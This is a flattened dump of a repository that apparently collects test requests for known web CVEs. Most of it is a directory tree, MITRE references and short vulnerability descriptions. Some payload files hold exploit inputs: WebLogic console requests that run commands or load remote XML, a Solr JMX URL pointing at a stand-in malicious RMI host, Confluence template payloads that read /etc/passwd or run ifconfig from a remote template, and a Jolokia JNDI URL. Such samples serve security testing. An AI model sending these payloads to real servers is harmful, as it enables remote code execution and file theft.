├── requirements.txt
├── tests
├── CVE-2015-6568
│ ├── file1.txt
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-9206
│ ├── file1.txt
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2017-9841
│ ├── test2.txt
│ ├── reference.txt
│ ├── test1.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-2618
│ ├── description.txt
│ ├── reference.txt
│ ├── test1.txt
│ ├── test2.txt
│ └── test.json
├── CVE-2006-2743
│ ├── reference.txt
│ ├── description.txt
│ ├── test.json
│ └── test1.txt
├── CVE-2007-5416
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2012-0391
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2012-0392
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2012-0393
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2012-0394
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2014-0114
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2014-3704
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2014-5194
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2014-6446
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2015-1397
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2015-1398
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2015-1399
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2015-3337
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-1182
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-4010
│ ├── reference.txt
│ ├── description.txt
│ ├── test.json
│ └── test1.txt
├── CVE-2016-6195
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-6896
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-7982
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2017-5638
│ ├── reference.txt
│ └── description.txt
├── CVE-2017-9805
│ ├── reference.txt
│ ├── description.txt
│ ├── test.json
│ ├── test1.txt
│ ├── test2.txt
│ └── test3.txt
├── CVE-2018-1327
│ ├── reference.txt
│ ├── test.json
│ ├── description.txt
│ └── test1.xml
├── CVE-2018-3252
│ ├── reference.txt
│ ├── PoC-3252.ser
│ ├── description.txt
│ └── test.json
├── CVE-2018-6389
│ ├── reference.txt
│ └── description.txt
├── CVE-2018-7422
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-7490
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-7600
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-7602
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-0192
│ ├── reference.txt
│ ├── test1.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-2725
│ ├── reference.txt
│ ├── description.txt
│ ├── test2.txt
│ ├── test3.txt
│ ├── test5.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2019-2729
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2019-3396
│ ├── reference.txt
│ ├── test1.txt
│ ├── test2.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-5418
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-6340
│ ├── reference.txt
│ ├── test2.txt
│ ├── test1.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-6341
│ ├── reference.txt
│ ├── description.txt
│ ├── test.json
│ └── test1.txt
├── CVE-2019-7139
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-7265
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-8394
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2020-3452
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2020-5902
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2020-6286
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2020-6287
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2017-10271
│ ├── reference.txt
│ ├── description.txt
│ ├── test3.txt
│ ├── test2.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2017-17671
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2017-17672
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-15961
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2018-20062
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-11043
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-11580
│ ├── reference.txt
│ ├── test.json
│ └── description.txt
├── CVE-2019-16759
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2019-19781
│ ├── reference.txt
│ ├── description.txt
│ ├── test.json
│ └── test1.txt
├── CVE-2020-14882
│ ├── reference.txt
│ ├── test1.txt
│ ├── test3.txt
│ ├── test5.txt
│ ├── test4.txt
│ ├── description.txt
│ └── test2.txt
├── CVE-2018-1000129
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-1000130
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2012-1007
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2016-10033
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2010-1870
│ ├── reference.txt
│ ├── description.txt
│ ├── test1.txt
│ └── test.json
├── CVE-2011-3923
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2013-1966
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2013-2248
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2013-2251
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-3081
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-3087
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-4438
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2017-12611
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2017-9791
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2018-11776
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2016-1181
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── CVE-2015-0899
│ ├── description.txt
│ ├── reference.txt
│ └── test.json
├── CVE-2019-0232
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
└── CVE-2019-6703
│ ├── reference.txt
│ ├── description.txt
│ └── test.json
├── Makefile
├── .github
└── workflows
│ └── python3.yml
├── .gitignore
├── README.md
└── groups.json
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | termcolor
3 | pylint
--------------------------------------------------------------------------------
/tests/CVE-2015-6568/file1.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/file1.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2017-9841/test2.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/description.txt:
--------------------------------------------------------------------------------
1 | TBD - weblogic unrestricted file upload
--------------------------------------------------------------------------------
/tests/CVE-2006-2743/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2743
--------------------------------------------------------------------------------
/tests/CVE-2007-5416/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5416
--------------------------------------------------------------------------------
/tests/CVE-2012-0391/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391
--------------------------------------------------------------------------------
/tests/CVE-2012-0392/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0392
--------------------------------------------------------------------------------
/tests/CVE-2012-0393/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0393
--------------------------------------------------------------------------------
/tests/CVE-2012-0394/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
--------------------------------------------------------------------------------
/tests/CVE-2014-0114/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
--------------------------------------------------------------------------------
/tests/CVE-2014-3704/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
--------------------------------------------------------------------------------
/tests/CVE-2014-5194/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5194
--------------------------------------------------------------------------------
/tests/CVE-2014-6446/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6446
--------------------------------------------------------------------------------
/tests/CVE-2015-1397/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1397
--------------------------------------------------------------------------------
/tests/CVE-2015-1398/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1398
--------------------------------------------------------------------------------
/tests/CVE-2015-1399/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1399
--------------------------------------------------------------------------------
/tests/CVE-2015-3337/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3337
--------------------------------------------------------------------------------
/tests/CVE-2015-6568/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6568
--------------------------------------------------------------------------------
/tests/CVE-2016-1182/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182
--------------------------------------------------------------------------------
/tests/CVE-2016-4010/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4010
--------------------------------------------------------------------------------
/tests/CVE-2016-6195/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6195
--------------------------------------------------------------------------------
/tests/CVE-2016-6896/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6896
--------------------------------------------------------------------------------
/tests/CVE-2016-7982/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7982
--------------------------------------------------------------------------------
/tests/CVE-2017-5638/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
--------------------------------------------------------------------------------
/tests/CVE-2017-9841/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9841
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1327
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3252
--------------------------------------------------------------------------------
/tests/CVE-2018-6389/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
--------------------------------------------------------------------------------
/tests/CVE-2018-7422/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7602
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9206
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0192
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2618
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5418
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6341
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7139
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7265
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8394
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6286
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271
--------------------------------------------------------------------------------
/tests/CVE-2017-17671/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17671
--------------------------------------------------------------------------------
/tests/CVE-2017-17672/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17672
--------------------------------------------------------------------------------
/tests/CVE-2017-9841/test1.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11580
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882
--------------------------------------------------------------------------------
/tests/CVE-2018-1000129/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000129
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000130
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/PoC-3252.ser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/foospidy/web-cve-tests/HEAD/tests/CVE-2018-3252/PoC-3252.ser
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/description.txt:
--------------------------------------------------------------------------------
1 | Linear eMerge E3-Series devices allow Remote Code Execution (root access over
2 | SSH).
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/description.txt:
--------------------------------------------------------------------------------
1 | Unauthenticated arbitrary file upload vulnerability in Blueimp
2 | jQuery-File-Upload <= v9.22.0
--------------------------------------------------------------------------------
/tests/CVE-2012-1007/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1007
2 | https://www.exploit-db.com/exploits/18452
--------------------------------------------------------------------------------
/tests/CVE-2016-10033/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
2 | https://github.com/opsxcq/exploit-CVE-2016-10033
--------------------------------------------------------------------------------
/tests/CVE-2010-1870/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870
2 | https://cwiki.apache.org/confluence/display/WW/S2-005
--------------------------------------------------------------------------------
/tests/CVE-2011-3923/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923
2 | https://cwiki.apache.org/confluence/display/WW/S2-009
--------------------------------------------------------------------------------
/tests/CVE-2013-1966/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966
2 | https://cwiki.apache.org/confluence/display/WW/S2-013
--------------------------------------------------------------------------------
/tests/CVE-2013-2248/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2248
2 | https://cwiki.apache.org/confluence/display/WW/S2-017
--------------------------------------------------------------------------------
/tests/CVE-2013-2251/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
2 | https://cwiki.apache.org/confluence/display/WW/S2-016
--------------------------------------------------------------------------------
/tests/CVE-2016-3081/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081
2 | https://cwiki.apache.org/confluence/display/WW/S2-032
--------------------------------------------------------------------------------
/tests/CVE-2016-3087/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3087
2 | https://cwiki.apache.org/confluence/display/WW/S2-033
--------------------------------------------------------------------------------
/tests/CVE-2016-4438/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438
2 | https://cwiki.apache.org/confluence/display/WW/S2-037
--------------------------------------------------------------------------------
/tests/CVE-2017-12611/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12611
2 | https://cwiki.apache.org/confluence/display/WW/S2-053
--------------------------------------------------------------------------------
/tests/CVE-2017-9791/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791
2 | https://cwiki.apache.org/confluence/display/WW/S2-048
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
2 | https://cwiki.apache.org/confluence/display/WW/S2-057
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "set-property": {
3 | "jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj"
4 | }
5 | }
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test1.txt:
--------------------------------------------------------------------------------
1 | _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('ps');
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test3.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");
--------------------------------------------------------------------------------
/tests/CVE-2016-1181/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1181
2 | https://security-tracker.debian.org/tracker/CVE-2016-1181
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test5.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22ps%22)
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/description.txt:
--------------------------------------------------------------------------------
1 | uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the
2 | --php-docroot option, allowing directory traversal.
--------------------------------------------------------------------------------
/tests/CVE-2016-4438/description.txt:
--------------------------------------------------------------------------------
1 | The REST plugin in Apache Struts 2 2.3.20 through 2.3.28.1 allows remote
2 | attackers to execute arbitrary code via a crafted expression.
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/description.txt:
--------------------------------------------------------------------------------
1 | Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 allows remote
2 | attackers to upload arbitrary files via login page customization.
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test4.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/description.txt:
--------------------------------------------------------------------------------
1 | vBulletin 5.x through 5.5.4 allows remote command execution via the
2 | widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
--------------------------------------------------------------------------------
/tests/CVE-2017-9791/description.txt:
--------------------------------------------------------------------------------
1 | The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution
2 | via a malicious field value passed in a raw message to the ActionMessage.
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/description.txt:
--------------------------------------------------------------------------------
1 | An issue was discovered in Citrix Application Delivery Controller (ADC) and
2 | Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test1.txt:
--------------------------------------------------------------------------------
1 | {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/description.txt:
--------------------------------------------------------------------------------
1 | A JNDI Injection vulnerability exists in Jolokia agent version 1.3.7 in the
2 | proxy mode that allows a remote attacker to run arbitrary Java code on the
3 | server.
--------------------------------------------------------------------------------
/tests/CVE-2015-0899/description.txt:
--------------------------------------------------------------------------------
1 | The MultiPageValidator implementation in Apache Struts 1 1.1 through 1.3.10
2 | allows remote attackers to bypass intended access restrictions via a modified
3 | page parameter.
--------------------------------------------------------------------------------
/tests/CVE-2017-12611/description.txt:
--------------------------------------------------------------------------------
1 | In Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10, using an
2 | unintentional expression in a Freemarker tag instead of string literals can
3 | lead to a RCE attack.
--------------------------------------------------------------------------------
/tests/CVE-2018-1000129/description.txt:
--------------------------------------------------------------------------------
1 | An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP
2 | servlet that allows an attacker to execute malicious javascript in the
3 | victim's browser.
--------------------------------------------------------------------------------
/tests/CVE-2016-4010/description.txt:
--------------------------------------------------------------------------------
1 | Magento CE and EE before 2.0.6 allows remote attackers to conduct PHP
2 | objection injection attacks and execute arbitrary PHP code via crafted
3 | serialized shopping cart data.
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "type" : "read",
3 | "mbean" : "java.lang:type=Memory",
4 | "target" : {
5 | "url" : "service:jmx:rmi:///jndi/ldap://localhost:9092/jmxrmi"
6 | }
7 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0232
2 | https://mail-archives.us.apache.org/mod_mbox/www-announce/201904.mbox/%3C13d878ec-5d49-c348-48d4-25a6c81b9605%40apache.org%3E
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6703
2 | https://www.wordfence.com/blog/2019/01/wordpress-sites-compromised-via-zero-day-vulnerabilities-in-total-donations-plugin/
--------------------------------------------------------------------------------
/tests/CVE-2015-0899/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0899
2 | https://www.fortinet.com/blog/threat-research/the-analysis-of-apache-struts-1-form-field-input-validation-bypass-cve-2015-0899.html
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test2.txt:
--------------------------------------------------------------------------------
1 | {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"ftp://10.10.20.166:8886/r.vm","command":"ifconfig"},"body":""}}
--------------------------------------------------------------------------------
/tests/CVE-2013-2251/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary
2 | OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or
3 | (3) redirectAction: prefix.
--------------------------------------------------------------------------------
/tests/CVE-2014-5194/description.txt:
--------------------------------------------------------------------------------
1 | Static code injection vulnerability in admin/admin.php in Sphider 1.3.6 allows
2 | remote authenticated users to inject arbitrary PHP code into settings/conf.php
3 | via the _word_upper_bound parameter.
--------------------------------------------------------------------------------
/tests/CVE-2015-3337/description.txt:
--------------------------------------------------------------------------------
1 | Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x
2 | before 1.5.2, when a site plugin is enabled, allows remote attackers to read
3 | arbitrary files via unspecified vectors.
--------------------------------------------------------------------------------
/tests/CVE-2013-1966/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary
2 | OGNL code via a crafted request that is not properly handled when using the
3 | includeParams attribute in the (1) URL or (2) A tag.
--------------------------------------------------------------------------------
/tests/CVE-2016-7982/description.txt:
--------------------------------------------------------------------------------
1 | Directory traversal vulnerability in ecrire/exec/valider_xml.php in SPIP 3.1.2
2 | and earlier allows remote attackers to enumerate the files on the system via
3 | the var_url parameter in a valider_xml action.
--------------------------------------------------------------------------------
/tests/CVE-2015-1398/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/index.php/downloadable/Adminhtml_Downloadable_File/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | }
9 | ]
10 |
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/description.txt:
--------------------------------------------------------------------------------
1 | Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and
